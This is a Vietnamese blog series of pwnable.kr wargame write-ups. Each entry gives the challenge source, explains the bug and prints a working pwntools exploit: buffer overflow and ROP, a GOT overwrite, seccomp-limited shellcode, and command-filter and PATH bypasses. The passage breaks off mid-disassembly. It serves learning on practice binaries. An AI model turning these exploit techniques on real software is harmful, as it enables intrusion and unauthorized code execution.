for(i=0; i<6; i++){
for(j=0; j<6; j++){
if(lotto[i] == submit[j]){
match++;
}
}
}

// win!
if(match == 6){
setregid(getegid(), getegid());
system("/bin/cat flag");
}
else{
printf("bad luck...\n");
}

}

void help(){
printf("- nLotto Rule -\n");
printf("nlotto is consisted with 6 random natural numbers less than 46\n");
printf("your goal is to match lotto numbers as many as you can\n");
printf("if you win lottery for *1st place*, you will get reward\n");
printf("for more details, follow the link below\n");
printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n");
printf("mathematical chance to win this game is known to be 1/8145060.\n");
}

int main(int argc, char* argv[]){

// menu
unsigned int menu;

while(1){

printf("- Select Menu -\n");
printf("1. Play Lotto\n");
printf("2. Help\n");
printf("3. Exit\n");

scanf("%d", &menu);

switch(menu){
case 1:
play();
break;
case 2:
help();
break;
case 3:
printf("bye\n");
return 0;
default:
printf("invalid menu\n");
break;
}
}
return 0;
}

Solution

Cái bug ở bài này đó là logic bị sai khi nó đem so toàn bộ các byte của chuỗi vừa được lấy random đem so với toàn bộ byte của chuỗi ta nhập vào, ví dụ rand='123456'và input=’111111’ thì với input là 6 số giống nhau, qua vòng lặp trên biến match kiểu gì cũng tăng lên được, nên ta sẽ bruteforce với hi vọng sẽ có 1 byte nào đó sẽ match với 1 byte trong rand, khoảng byte được rand cũng không nhiều vì nó sẽ từ 1 → 45.

Payload

payload là mình solve local để chắc chắn idea đúng. khi đó thì mình làm thủ công trên server bằng cách spam chuỗi ‘!!!!!!’ vào input, vài lần là được.

from pwn import *
import sys

if len(sys.argv) <= 2:
    p = process('./' + sys.argv[1])
    e = ELF('./' + sys.argv[1], checksec=False)

    gdb.attach(p,
'''
'''
)
else:
    remote_addr = sys.argv[1]
    remote_port = sys.argv[2]
    p = remote(remote_addr, int(remote_port))

context.log_level = 'DEBUG'
context.arch = 'amd64'

while(1):
    payload = b'\x01'*6
    p.sendlineafter(b'3. Exit', b'1')
    p.sendlineafter(b'Submit your 6 lotto bytes :',payload)
p.interactive()

# !!!!!
# Sorry_mom_1_Forgot_to_check_duplicates

cmd1

Description

1
2
3

Mommy! what is PATH environment in Linux?

ssh cmd1@pwnable.kr -p2222 (pw:guest)

Source

#include 
#include 

int filter(char *cmd)
{
int r = 0;
r += strstr(cmd, "flag") != 0;
r += strstr(cmd, "sh") != 0;
r += strstr(cmd, "tmp") != 0;
return r;
}
int main(int argc, char *argv[], char **envp)
{
putenv("PATH=/thankyouverymuch");
if (filter(argv[1]))
return 0;
setregid(getegid(), getegid());
system(argv[1]);
return 0;
}

Solution

Cách vận hành của chương trình là set biến môi trường thành 1 đường dẫn không tồn tại là /thankyouverymuch sau đó filter argv[1] và thực thi. Câu lệnh putenv. Mục tiêu ta là bypass filter và path môi trường. Thì với một lệnh được thực thi 1 cách bình thường thì nó sẽ tự động lấy PATH môi trường để tìm nơi chứa câu lệnh đó. Ví dụ với ls sẽ thành /usr/bin/ls. Muốn biết đường dẫn của câu lệnh ở đâu trên hệ thống thì chỉ cần dùng lệnh which :

1 2	cmd1@ubuntu:~$ which ls /usr/bin/ls

Vậy thì với input đầu vào ta chỉ cần dùng đường dẫn tuyệt đối thì hệ thống sẽ gọi trực tiếp tới đó và tránh được PATH cố định đã bị cố định.

cmd1@ubuntu:~$ ./cmd1 ls
sh: 1: ls: not found
cmd1@ubuntu:~$ ./cmd1 /usr/bin/ls
cmd1  cmd1.c  flag

Tới tránh filter câu lệnh có flag thì ta chỉ cần dùng wildcard * là được. Mình thì cứ giã cat * là đọc full :))) Còn không thì chuyên nghiệp hơn thì như dưới :

1 2	cmd1@ubuntu:~$ ./cmd1 "/usr/bin/cat fl" PATH_environment?_Now_I_really_g3t_it,_mommy!

cmd2

Description

Daddy bought me a system command shell.
but he put some filters to prevent me from playing with it without his permission...
but I wanna play anytime I want!

ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)

Source

#include 
#include 

int filter(char* cmd){
int r=0;
r += strstr(cmd, "=")!=0;
r += strstr(cmd, "PATH")!=0;
r += strstr(cmd, "export")!=0;
r += strstr(cmd, "/")!=0;
r += strstr(cmd, "`")!=0;
r += strstr(cmd, "flag")!=0;
return r;
}

extern char** environ;
void delete_env(){
char** p;
for(p=environ; *p; p++)memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
delete_env();
putenv("PATH=/no_command_execution_until_you_become_a_hacker");
if(filter(argv[1])) return 0;
printf("%s\n", argv[1]);
setregid(getegid(), getegid());

system( argv[1] );
return 0;
}

Solution

Câu này khoai hơn, nó filter cả / và export nên coi như không khôn lỏi như trên được. Do đó ta cần dùng tới câu lệnh command - Được tích hợp sẵn theo tiêu chuẩn POSIX nên mọi shell sẽ có lệnh này. Thì thực ra trong shell có những module được builtin - Có nghĩa là gắn liền và tích hợp vào shell, thì ngoài lệnh command được đề cập ở trên thì có những thứ khác như đường dẫn tiêu chuẩn cũng tính hợp vào shell, đó là /bin:/usr/bin. GIúp cho việc thực thi lệnh chuẩn nhất có thể cho dù có đổi bao nhiêu path đi chăng nữa. Một từ khóa giải quyết toàn bộ vấn đề.

1
2
3

cmd2@ubuntu:~$ ./cmd2 'command -p cat *fl*'
command -p cat *fl*
Shell_variables_can_be_quite_fun_to_play_with!

asm

Description

1
2
3

Mommy! I think I know how to make shellcode

ssh asm@pwnable.kr -p2222 (pw: guest)

Source

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define LENGTH 128

void sandbox(){
scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);
if (ctx == NULL) {
printf("seccomp error\n");
exit(0);
}

seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);

if (seccomp_load(ctx) < 0){
seccomp_release(ctx);
printf("seccomp error\n");
exit(0);
}
seccomp_release(ctx);
}

char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff";
unsigned char filter[256];
int main(int argc, char* argv[]){

setvbuf(stdout, 0, _IONBF, 0);
setvbuf(stdin, 0, _IOLBF, 0);

printf("Welcome to shellcoding practice challenge.\n");
printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");
printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");
printf("If this does not challenge you. you should play 'asg' challenge :)\n");

char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);
memset(sh, 0x90, 0x1000);
memcpy(sh, stub, strlen(stub));

int offset = sizeof(stub);
printf("give me your x64 shellcode: ");
read(0, sh+offset, 1000);

alarm(10);
chroot("/home/asm_pwn");// you are in chroot jail. so you can't use symlink in /tmp
sandbox();
((void (*)(void))sh)();
return 0;
}

Solution

Câu này là dạng seccomp, nghĩa là nó có thể chặn các hành động của syscall. Dùng seccomp-tools là sẽ nhận diện được :

 seccomp-tools dump ./asm
Welcome to shellcoding practice challenge.
In this challenge, you can run your x64 shellcode under SECCOMP sandbox.
Try to make shellcode that spits flag using open()/read()/write() systemcalls only.
If this does not challenge you. you should play 'asg' challenge :)
give me your x64 shellcode: 123
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x06 0xffffffff  if (A != 0xffffffff) goto 0011
 0005: 0x15 0x04 0x00 0x00000000  if (A == read) goto 0010
 0006: 0x15 0x03 0x00 0x00000001  if (A == write) goto 0010
 0007: 0x15 0x02 0x00 0x00000002  if (A == open) goto 0010
 0008: 0x15 0x01 0x00 0x0000003c  if (A == exit) goto 0010
 0009: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0011
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0011: 0x06 0x00 0x00 0x00000000  return KILL

Ở đây nó cho thực thi lệnh read, write, open → Đủ đọc flag :>

Vậy chỉ cần tạo shell để mở, đọc vài in ra file trong màn hình thôi :> Trong shellcode của mình là mình sẽ gọi tới 1 luồng nhập vào và mở file với tên của luồng đó.

Payload

from pwn import *
import sys

if len(sys.argv) <= 2:
    p = process("./" + sys.argv[1])
    e = ELF("./" + sys.argv[1], checksec=False)

else:
    remote_addr = sys.argv[1]
    remote_port = sys.argv[2]
    p = remote(remote_addr, int(remote_port))

context.log_level = 'DEBUG'
context.arch = 'amd64'

filename = b"this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong\x00"

shellcode = asm(f"""
xor eax, eax      
xor edi, edi     
mov rsi, rsp
mov dl, 0xff 
syscall

mov rdi, rsp
xor esi, esi
mov al, 2
syscall

mov rdi, rax
mov rsi, rsp
mov dl, 0xff
xor eax, eax
syscall

mov rdx, rax
mov dil, 1
mov al, 1
syscall
""")

payload = shellcode
p.sendlineafter(b'give me your x64 shellcode:', payload)
p.sendlineafter(b'',filename)
p.interactive()

horcruxes

Description

Voldemort concealed his splitted soul inside 7 horcruxes.
Find all horcruxes, and ROP it!
author: jiwon choi

ssh horcruxes@pwnable.kr -p2222 (pw:guest)

Source

using IDA to reverse and get source.

int A()
{
  return printf("You found \"Tom Riddle's Diary\" (EXP +%d)\n", a);
}

int B()
{
  return printf("You found \"Marvolo Gaunt's Ring\" (EXP +%d)\n", b);
}

int C()
{
  return printf("You found \"Helga Hufflepuff's Cup\" (EXP +%d)\n", c);
}

int D()
{
  return printf("You found \"Salazar Slytherin's Locket\" (EXP +%d)\n", d);
}

int E()
{
  return printf("You found \"Rowena Ravenclaw's Diadem\" (EXP +%d)\n", e);
}

int F()
{
  return printf("You found \"Nagini the Snake\" (EXP +%d)\n", f);
}

int G()
{
  return printf("You found \"Harry Potter\" (EXP +%d)\n", g);
}

int ropme()
{
  char s[100]; // [esp+4h] [ebp-74h] BYREF
  int v2; // [esp+68h] [ebp-10h] BYREF
  int fd; // [esp+6Ch] [ebp-Ch]

  printf("Select Menu:");
  __isoc99_scanf("%d", &v2);
  getchar();
  if ( v2 == a )
  {
    A();
  }
  else if ( v2 == b )
  {
    B();
  }
  else if ( v2 == c )
  {
    C();
  }
  else if ( v2 == d )
  {
    D();
  }
  else if ( v2 == e )
  {
    E();
  }
  else if ( v2 == f )
  {
    F();
  }
  else if ( v2 == g )
  {
    G();
  }
  else
  {
    printf("How many EXP did you earned? : ");
    gets(s);
    if ( atoi(s) == sum )
    {
      fd = open("/home/horcruxes_pwn/flag", 0);
      s[read(fd, s, 0x64u)] = 0;
      puts(s);
      close(fd);
      exit(0);
    }
    puts("You'd better get more experience to kill Voldemort");
  }
  return 0;
}

int init_ABCDEFG()
{
  int result; // eax
  unsigned int buf; // [esp+8h] [ebp-10h] BYREF
  int fd; // [esp+Ch] [ebp-Ch]

  fd = open("/dev/urandom", 0);
  if ( read(fd, &buf, 4u) != 4 )
  {
    puts("/dev/urandom error");
    exit(0);
  }
  close(fd);
  srand(buf);
  a = -559038737 * rand() % 0xCAFEBABE;
  b = -559038737 * rand() % 0xCAFEBABE;
  c = -559038737 * rand() % 0xCAFEBABE;
  d = -559038737 * rand() % 0xCAFEBABE;
  e = -559038737 * rand() % 0xCAFEBABE;
  f = -559038737 * rand() % 0xCAFEBABE;
  g = -559038737 * rand() % 0xCAFEBABE;
  result = f + e + d + c + b + a + g;
  sum = result;
  return result;
}

int hint()
{
  puts("Voldemort concealed his splitted soul inside 7 horcruxes.");
  return puts("Find all horcruxes, and destroy it!\n");
}

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp+0h] [ebp-Ch]

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 2, 0);
  alarm(0x3Cu);
  hint();
  init_ABCDEFG();
  v4 = seccomp_init(0);
  seccomp_rule_add(v4, 2147418112, 173, 0);
  seccomp_rule_add(v4, 2147418112, 5, 0);
  seccomp_rule_add(v4, 2147418112, 295, 0);
  seccomp_rule_add(v4, 2147418112, 3, 0);
  seccomp_rule_add(v4, 2147418112, 4, 0);
  seccomp_rule_add(v4, 2147418112, 252, 0);
  seccomp_load(v4);
  return ropme();
}

Checksec :

Arch:     i386
RELRO:      Full RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        No PIE (0x8040000)
Stripped:   No

Solution

Bug ở đây là gọi tới hàm nhập gets(). Ta có chương trình là địa chỉ tĩnh và không có canary, khả năng cao là bof và dẫn đến tạo ROP chain.

Vì có sẵn đoạn code đọc flag nếu thõa yêu cầu, ta sẽ bof địa chỉ trả về là địa chỉ của câu lệnh bắt đầu đọc flag và thêm 1 chút tùy chỉnh là được.

Payload

from pwn import *
import sys

if len(sys.argv) <= 2:
    p = process("./" + sys.argv[1])
    e = ELF("./" + sys.argv[1], checksec=False)

    gdb.attach(p,
'''
b*0x08041604
b*ropme
'''
)
else:
    remote_addr = sys.argv[1]
    remote_port = sys.argv[2]
    p = remote(remote_addr, int(remote_port))

context.log_level = 'DEBUG'
context.arch = 'amd64'

flag_path = 0x8042174+0x1e1c
ropme_282 = 0x08041625
valid_address = 0x8044300
payload = b'a'*112 + p32(flag_path) + p32(valid_address) +  p32(ropme_282)

p.sendlineafter(b'Find all horcruxes, and destroy it!', b'1')
p.sendlineafter(b'How many EXP did you earned?', payload)

p.interactive()

Doneeeeeeee ! Rookiss go go brrr brrr !

PWNABLE.KR - Phần 1

2026-02-02T14:41:01.000Z

Đây là series try hard giải các challenge trên trang web pwnable.kr. Với mỗi chall mình sẽ phân tích hướng giải và những điều mình học được từ những challenge đó :>

fd

Description

Mommy! what is a file descriptor in Linux?

* try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link:
https://youtu.be/971eZhMHQQw

ssh fd@pwnable.kr -p2222 (pw:guest)

Source

#include 
#include 
#include 
char buf[32];
int main(int argc, char* argv[], char* envp[]){
if(argc<2){
printf("pass argv[1] a number\n");
return 0;
}
int fd = atoi( argv[1] ) - 0x1234;
int len = 0;
len = read(fd, buf, 32);
if(!strcmp("LETMEWIN\n", buf)){
printf("good job :)\n");
setregid(getegid(), getegid());
system("/bin/cat flag");
exit(0);
}
printf("learn about Linux file IO\n");
return 0;

}

Solution

Khi gọi hàm read, chương trình truyền vào tham số đầu tiên là fd với fd được tính theo công thức atoi( argv[1] ) - 0x1234 và argv[1] có nghĩa là tham số đầu tiên khi bạn gọi file ( ví dụ như ./fd 123)

Và nếu như read thực thi thành công thì sẽ yêu cầu bạn nhập input và lưu vào biến buf, sau đó đem đi so sánh với chuỗi LETMEWIN\n là đọc được flag.

tìm hiểu fd thì mình biết được rằng đó là chỉ số file description, với đầu vào là input từ bàn phím thì ta cần nó là fd của STDIN tương đương với 0, argv[1] sẽ được atoi() chuyển về số nguyên và đem trừ với 0x1234 thì ta chỉ cần gọi file với tham số đầu là 4660 là được.

Payload

from pwn import *
import sys

### USING : python3 solve.py fd

p = ssh(
    user=sys.argv[1],
    host='pwnable.kr',
    port=2222,
    password='guest',
)
sh = p.shell()

fd_minus = 0x1234
sh.sendline(f'./fd {fd_minus}')
sh.send('LETMEWIN\n')

sh.interactive()

Collision

Description

Daddy told me about cool MD5 hash collision today.
I wanna do something like that too!

ssh col@pwnable.kr -p2222 (pw:guest)

Source

#include 
#include 
unsigned long hashcode = 0x21DD09EC;
unsigned long check_password(const char* p){ 
        int* ip = (int*)p;
        int i;
        int res=0;
        for(i=0; i<5; i++){
                res += ip[i];
        }
        return res;
}

int main(int argc, char* argv[]){
        if(argc<2){
                printf("usage : %s [passcode]\n", argv[0]);
                return 0;
        }
        if(strlen(argv[1]) != 20){
                printf("passcode length should be 20 bytes\n");
                return 0;
        }

        if(hashcode == check_password( argv[1] )){
                setregid(getegid(), getegid());
                system("/bin/cat flag");
                return 0;
        }
        else
                printf("wrong passcode.\n");
        return 0;
}

Solution

Bài này yêu cầu đầu vào dài 20 byte. Sau đó làm gì đó với input của mình rồi mới đem so với biến hashcode. Hàm check_password() nhận vào 1 chuỗi dài 20 byte, sau đó gọi 1 con trỏ int để trỏ tới 4 kí tự 1 lần.

Ví dụ mình nhập aaaabbbbccccddddeeee thì con trỏ đầu tiên sẽ trỏ tới địa chỉ mang giá trị 0x4141414141 rồi cộng số đó vào biến res. Nôm na thì là chuỗi dài 20 kí tự, lấy hex của 4 kí tự đầu ra, cộng vào res, tới 4 kí tự tiếp theo và làm hành động đó tổng là 5 lần. Vậy thì ta chỉ cần lấy biến hashcode chia ra làm 4 phần bằng nhau và cộng với phần còn lại, ghép 5 phần thành 1 chuỗi thì ta sẽ thu được 1 chuỗi khi đi qua hàm check_password() sẽ trả về giá trị bằng với hashcode. Mình không chia cho 5 vì khi lấy chuỗi 0x21DD09EC/5thì mình thấy dư nên sẽ chia 4, vừa tròn đẹp :>

Payload

Để cho tiện thì mình in chuỗi đó ra rồi thêm trực tiếp vào chương trình bằng thủ công :

hashcode = 0x21DD09EC
chunk = int(hashcode/5)
final_chunk = hashcode-chunk*4
payload = p32(chunk)*4 + p32(final_chunk)
print(repr(payload))

# output : b'\xc8\xce\xc5\x06\xc8\xce\xc5\x06\xc8\xce\xc5\x06\xc8\xce\xc5\x06\xcc\xce\xc5\x06'
# usage  : ./col $'\xc8\xce\xc5\x06\xc8\xce\xc5\x06\xc8\xce\xc5\x06\xc8\xce\xc5\x06\xcc\xce\xc5\x06'

Bof

Description

Nana told me that buffer overflow is one of the most common software vulnerability. 
Is that true?

ssh bof@pwnable.kr -p2222 (pw: guest)

Source

#include 
#include 
#include 
void func(int key){
char overflowme[32];
printf("overflow me : ");
gets(overflowme);// smash me!
if(key == 0xcafebabe){
setregid(getegid(), getegid());
system("/bin/sh");
}
else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return 0;
}

Solution

Với biến overflowme được khai báo là 32 byte nhưng gọi tới hàm gets() - một hàm nhập không có điểm dừng :v Nên chỉ cần mình khi tràn xuống biến key ở dưới là được. Chương trình được cho là x86 có nghĩa là tham số key sẽ nằm trên stack khi được khai báo và địa chỉ sẽ nằm cao hơn địa chỉ của biến local của hàm func ⇒ Biến overflowme có thể thay đổi giá trị của biến key khi ghi tràn.

Payload

from pwn import *
import sys

### USING : python3 solve.py bof

p = ssh(
    user=sys.argv[1],
    host='pwnable.kr',
    port=2222,
    password='guest',
)
sh = p.shell()

sh.sendline(b'nc 0 9000')

payload = b'a'*52
payload += p32(0xcafebabe)
sh.sendline(payload)

#cat flag

sh.interactive()

Passcode

Description

Mommy told me to make a passcode based login system.
My first trial C implementation compiled without any error!
Well, there were some compiler warnings, but who cares about that?

ssh passcode@pwnable.kr -p2222 (pw:guest)

Source

#include 
#include 

void login(){
int passcode1;
int passcode2;

printf("enter passcode1 : ");
scanf("%d", passcode1);
fflush(stdin);

// ha! mommy told me that 32bit is vulnerable to bruteforcing :)
printf("enter passcode2 : ");
        scanf("%d", passcode2);

printf("checking...\n");
if(passcode1==123456 && passcode2==13371337){
                printf("Login OK!\n");
setregid(getegid(), getegid());
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
exit(0);
        }
}

void welcome(){
char name[100];
printf("enter you name : ");
scanf("%100s", name);
printf("Welcome %s!\n", name);
}

int main(){
printf("Toddler's Secure Login System 1.1 beta.\n");

welcome();
login();

// something after login...
printf("Now I can safely trust you that you have credential :)\n");
return 0;
}

Checksec

Arch:     i386
RELRO:      Partial RELRO
Stack:      Canary found
NX:         NX enabled
PIE:        No PIE (0x8048000)
Stripped:   No

Solution

Chạy chương trình và nhập vào biến thứ 2 thì gặp lỗi Segment fault nên phân tích code thì rõ là đoạn code đã code sai đoạn input passcode1 và passcode2 là thay vì truyền vào địa chỉ của 2 biến thì lại truyền vào giá trị, có nghĩa là khi chạy thì nó sẽ lấy giá trị nào nó trên thanh stack để nhập vào. Điều hay là chương trình vô tình nhập được vào passcode1 (author setup :v). Việc nhập vào được vẫn là khả thi nếu như giá trị được trỏ tới là một địa chỉ hợp lệ (một địa chỉ đang tồn tại trong chương trình và có quyền ghi). Và khi debug sẽ thấy passcode1 được nhận 1 địa chỉ hợp lệ, passcode2 nhận một địa chỉ rác (nó là canary nhưng ta không cần quan tâm, sự xuất hiện của nó giúp mình nhìn thấy được các giá trị khác). Và khi debug hàm welcome sẽ thấy 2 giá trị này cũng tồn tại trên stack khi chương tình bảo nhập tên. Thực tế thì 2 giá trị đó đều là giá trị của thanh stack cũ.

Nhập 95 kí tự vào name và kiểm tra trạng thái stack sẽ thấy được 1 địa chỉ hợp lệ và 1 giá trị hợp lệ khi gọi hàm welcome và nhập tên (ảnh 1)

                     Trạng thái stack của hàm welcome khi nhập 95 kí tự

Khi đó debug cũng sẽ thấy các giá trị này được gọi tới như tham số thứ 2 của hàm scanf

                    Các tham số được gọi khi gọi hàm scanf cho giá trị của passcode1

                    Các tham số được gọi khi gọi hàm scanf cho giá trị của passcode2

Nhập tên dài hơn 4 kí tự sẽ khi đè địa chỉ đó, vậy có nghĩa là ta có thể điều khiển địa chỉ nhập vào của passcode1. Vì không có bảo vệ RELRO và địa chỉ PIE tĩnh nên ta sẽ tấn công địa chỉ GOT của 1 hàm nào sau đó khi nhập xong passcode1. Mình chọn hàm fflush là mục tiêu vì là chọn hàm gần nhất thì giảm rủi ro chương trình bị lỗi.

Solution

from pwn import *
import sys

# usage: python3 solve.py passcode

if len(sys.argv) <= 2:
    p = process("./" + sys.argv[1])
    e = ELF("./" + sys.argv[1], checksec=False)

else:
    remote_addr = sys.argv[1]
    remote_port = sys.argv[2]
    p = remote(remote_addr, int(remote_port))

context.log_level = 'DEBUG'
context.arch = 'amd64'

fflush_got = 0x0804c030
login_168 = 0x0804929e #win
name = b'a'*96 + p32(fflush_got)

p.sendline(name)
p.sendline(str(login_168))
p.interactive()

Đây là chương trình khai thác local và đã thành công. Riêng trên remote thì mình tà đạo 1 chút (vì nó lỗi hoài T~T )

1 2	python -c 'import sys; sys.stdout.buffer.write(b"\x41"*96 + b"\x14\xc0\x04\x08" + b"134517391")' \| ./passcode

Random

Description

1
2
3

Daddy, teach me how to use random value in programming!

ssh random@pwnable.kr -p2222 (pw:guest)

Source

#include 
#include 

int main()
{
unsigned int random;
random = rand(); // random value!

unsigned int key = 0;
scanf("%d", &key);

if ((key ^ random) == 0xcafebabe)
{
printf("Good!\n");
setregid(getegid(), getegid());
system("/bin/cat flag");
return 0;
}

printf("Wrong, maybe you should try 2^32 cases.\n");
return 0;
}

Solution

Với rand() mà không có seed truyền vào thì nó không thực sự random mà mình có thể biết được đầu ra bằng cách chạy 1 đoạn code với hàm rand() thì sẽ thu được giá trị giống như chương trình. Vậy thì chỉ cần viết lại 1 chương trình khác in ra hàm rand() 1 lần và lấy giá trị đó xor với 0xcafebabe là sẽ thu được kết quả.

Payload

from pwn import *
import sys

p = ssh(
    user=sys.argv[1],
    host='pwnable.kr',
    port=2222,
    password='guest',
)
sh = p.shell()
sh.recvuntil(f'{sys.argv[1]}@ubuntu:~$')

first_time = 1804289383
key = f'{first_time^0xcafebabe}'

sh.sendline('./random')
sh.sendline(key)

sh.interactive()

Input2

Description

1
2
3

Mom? how can I pass my input to a computer program?

ssh input2@pwnable.kr -p2222 (pw:guest)

Source

#include 
#include 
#include 
#include 
#include 

int main(int argc, char* argv[], char* envp[]){
printf("Welcome to pwnable.kr\n");
printf("Let's see if you know how to give input to program\n");
printf("Just give me correct inputs then you will get the flag :)\n");

// argv
if(argc != 100) return 0;
if(strcmp(argv['A'],"\x00")) return 0;
if(strcmp(argv['B'],"\x20\x0a\x0d")) return 0;
printf("Stage 1 clear!\n");

// stdio
char buf[4];
read(0, buf, 4);
if(memcmp(buf, "\x00\x0a\x00\xff", 4)) return 0;
read(2, buf, 4);
        if(memcmp(buf, "\x00\x0a\x02\xff", 4)) return 0;
printf("Stage 2 clear!\n");

// env
if(strcmp("\xca\xfe\xba\xbe", getenv("\xde\xad\xbe\xef"))) return 0;
printf("Stage 3 clear!\n");

// file
FILE* fp = fopen("\x0a", "r");
if(!fp) return 0;
if( fread(buf, 4, 1, fp)!=1 ) return 0;
if( memcmp(buf, "\x00\x00\x00\x00", 4) ) return 0;
fclose(fp);
printf("Stage 4 clear!\n");

// network
int sd, cd;
struct sockaddr_in saddr, caddr;
sd = socket(AF_INET, SOCK_STREAM, 0);
if(sd == -1){
printf("socket error, tell admin\n");
return 0;
}
saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = INADDR_ANY;
saddr.sin_port = htons( atoi(argv['C']) );
if(bind(sd, (struct sockaddr*)&saddr, sizeof(saddr)) < 0){
printf("bind error, use another port\n");
    return 1;
}
listen(sd, 1);
int c = sizeof(struct sockaddr_in);
cd = accept(sd, (struct sockaddr *)&caddr, (socklen_t*)&c);
if(cd < 0){
printf("accept error, tell admin\n");
return 0;
}
if( recv(cd, buf, 4, 0) != 4 ) return 0;
if(memcmp(buf, "\xde\xad\xbe\xef", 4)) return 0;
printf("Stage 5 clear!\n");

// here's your flag
setregid(getegid(), getegid());
system("/bin/cat flag");
return 0;
}

Solution

Bài này hay ở chỗ nó dạy mình biết rằng các đầu vào của một chương trình có thể lấy như từ biến môi trường, file, stdin,… Cách giải thì chỉ cần research những đầu vào tương ứng như trong source là được. Ở đây mình cần dùng script để setup các tham số, các biến, và các pipline để bypass các stage.

Stage 1 : Argc là số lượng tham số bạn truyền vào, với tham số đầu tiên luôn là tên file. Tham số argv với argv[’A’] tương đương argv[65]. Được truyền vào như sau : ./file a b c với a b c là các tham số argv.

Stage 2 : với fd=0 sẽ là stdin và fd=2 là stderr, ở đây ta cần dùng script để tạo 1 luồng khác, gán stderr vào luồng đó và ghi vào đó giá trị tương ứng.

Stage 3 : Setup biến môi trường.

Stage 4 : Setup file. Bạn có thể tạo và file bằng python hoặc bằng bash script.

Stage 5 : Là stage dùng socket để gửi nhận giá trị, chỉ cần dùng pwntool để mở 1 luồng remote tới chương trình là ok.

Payload

from pwn import *
context.log_level = 'DEBUG'

######### STAGE 1 #########
argv = ['/home/input2/input2'] + ['a']*99
argv[ord('A')] = ''
argv[ord('B')] = '\x20\x0a\x0d'

argv[ord('C')] = '4445' # for stage 5

######### STAGE 2 #########
r1,w1 = os.pipe() # tạo 1 pipe, câu lệnh trả về 2 biến read và write
r2,w2 = os.pipe()

os.write(w1,b'\x00\x0a\x00\xff')
os.write(w2,b'\x00\x0a\x02\xff')
# cách 2 đó là dùng PTY

######### STAGE 3 #########
env = {'\xde\xad\xbe\xef': '\xca\xfe\xba\xbe'}

######### STAGE 4 #########
with open('\x0a', 'wb') as f:
    # Ghi dữ liệu vào tệp
    f.write(b'\x00\x00\x00\x00')
# một cách khác đó là tạo 1 file bằng bash : touch $'\x0a' và dùng công cụ như HxD thêm 4 byte \x00 vào file là được

p = process(argv,stdin=r1,stderr=r2, env=env)

######### STAGE 5 #########
conn = remote('localhost',4445)
conn.sendline(b'\xde\xad\xbe\xef')

p.interactive()

Leg

Description

Daddy told me I should study ARM architecture.
But I know Intel architecture and it should be similar.
Why bother to study ARM?

Download : http://pwnable.kr/bin/leg.c
Download : http://pwnable.kr/bin/leg.asm

ssh leg@pwnable.kr -p2222 (pw:guest)

Source

leg.c

#include 
#include 
#include 
#include 

int key1()
{
    asm("mov r3, pc\n");
}
int key2()
{
    asm(
        "push{r6}\n"
        "addr6, pc, $1\n"
        "bxr6\n"
        ".code   16\n"
        "movr3, pc\n"
        "addr3, $0x4\n"
        "push{r3}\n"
        "pop{pc}\n"
        ".code32\n"
        "pop{r6}\n");
}
int key3()
{
    asm("mov r3, lr\n");
}
int main()
{
    int key = 0;
    printf("Daddy has very strong arm! : ");
    scanf("%d", &key);
    if ((key1() + key2() + key3()) == key)
    {
        printf("Congratz!\n");
        int fd = open("flag", O_RDONLY);
        char buf[100];
        int r = read(fd, buf, 100);
        write(0, buf, r);
    }
    else
    {
        printf("I have strong leg :P\n");
    }
    return 0;
}

leg.asm

(gdb) disass main
Dump of assembler code for function main:
   0x00008d3c <+0>:push{r4, r11, lr}
   0x00008d40 <+4>:addr11, sp, #8
   0x00008d44 <+8>:subsp, sp, #12
   0x00008d48 <+12>:movr3, #0
   0x00008d4c <+16>:strr3, [r11, #-16]
   0x00008d50 <+20>:ldrr0, [pc, #104]; 0x8dc0 132>
   0x00008d54 <+24>:bl0xfb6c <printf>
   0x00008d58 <+28>:subr3, r11, #16
   0x00008d5c <+32>:ldrr0, [pc, #96]; 0x8dc4 136>
   0x00008d60 <+36>:movr1, r3
   0x00008d64 <+40>:bl0xfbd8 <__isoc99_scanf>
   0x00008d68 <+44>:bl0x8cd4 
   0x00008d6c <+48>:movr4, r0
   0x00008d70 <+52>:bl0x8cf0 
   0x00008d74 <+56>:movr3, r0
   0x00008d78 <+60>:addr4, r4, r3
   0x00008d7c <+64>:bl0x8d20 
   0x00008d80 <+68>:movr3, r0
   0x00008d84 <+72>:addr2, r4, r3
